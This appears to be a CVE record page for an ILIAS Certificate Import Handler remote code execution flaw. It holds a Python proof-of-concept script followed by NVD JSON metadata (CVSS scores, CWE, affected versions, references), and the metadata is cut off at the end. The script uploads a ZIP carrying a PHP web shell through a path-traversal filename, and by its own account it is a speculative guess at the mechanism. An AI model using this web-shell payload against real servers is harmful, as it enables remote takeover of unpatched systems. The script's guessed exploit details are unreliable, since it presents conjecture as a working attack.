CVE-2025-11344

# CVE-2025-11344 - ILIAS Certificate Import Handler RCE PoC # Note: This is a conceptual PoC based on the vulnerability description. # The actual exploit requires crafting a malicious certificate file # that bypasses the import handler's validation logic. import requests import zipfile import io import os TARGET_URL = "https://target-ilias-instance.com" LOGIN_URL = f"{TARGET_URL}/ilias/login.php" IMPORT_URL = f"{TARGET_URL}/ilias/ilias.php?baseClass=ilCertificateGUI" USERNAME = "attacker_user" PASSWORD = "attacker_password" # Step 1: Authenticate to ILIAS (requires valid credentials or session) def get_session(): session = requests.Session() # Obtain login form and CSRF token resp = session.get(LOGIN_URL) # Perform login (simplified - actual implementation may vary) login_data = { "username": USERNAME, "password": PASSWORD, "cmd[doStandardAuthentication]": "Login", } session.post(LOGIN_URL, data=login_data) return session # Step 2: Craft malicious certificate archive def create_malicious_certificate(): # The certificate import handler likely accepts ZIP archives # containing certificate definition files (XML, images, etc.) buf = io.BytesIO() with zipfile.ZipFile(buf, 'w') as zf: # Inject a webshell or malicious PHP file via path traversal zf.writestr("cert.xml", "<?xml version='1.0'?><certificate><title>Test</title></certificate>") # Malicious payload disguised as a certificate resource zf.writestr("../../shell.php", "<?php system($_GET['cmd']); ?>") buf.seek(0) return buf # Step 3: Upload the malicious certificate def exploit(session, cert_data): files = {"certificate_file": ("cert.zip", cert_data, "application/zip")} data = {"cmd[importCertificate]": "Import"} resp = session.post(IMPORT_URL, files=files, data=data) print(f"Status: {resp.status_code}") print(f"Response length: {len(resp.text)}") return resp if __name__ == "__main__": print("[*] CVE-2025-11344 - ILIAS Certificate Import RCE PoC") print("[*] This is a conceptual demonstration only.") # session = get_session() # cert = create_malicious_certificate() # exploit(session, cert)

{"cve": {"id": "CVE-2025-11344", "sourceIdentifier": "[email protected]", "published": "2025-10-06T19:15:34.523", "lastModified": "2026-01-23T19:15:51.993", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in ILIAS up to 8.23/9.13/10.1. Affected by this vulnerability is an unknown functionality of the component Certificate Import Handler. The manipulation results in Remote Code Execution. The attack may be performed from remote. Upgrading to version 8.24, 9.14 and 10.2 addresses this issue. It is recommended to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ilias:ilias:8.23:*:*:*:*:*:*:*", "matchCriteriaId": "58F9FBA3-89C9-4EC7-9913-770F9C71A569"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ilias:ilias:9.13:*:*:*:*:*:*:*", "matchCriteriaId": "BE5461D9-97C8-4DEE-8E3D-AAEE8840A209"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ilias:ilias:10.1:*:*:*:*:*:*:*", "matchCriteriaId": "B4E16B93-654E-47D4-A498-C759D1F4B1EB"}]}]}], "references": [{"url": "https://docu.ilias.de/go/blog/15821/882", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.327229", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327229", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664889", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://srlabs.de/blog/breaking-ilias-part-2-three-to-rce", ... (truncated)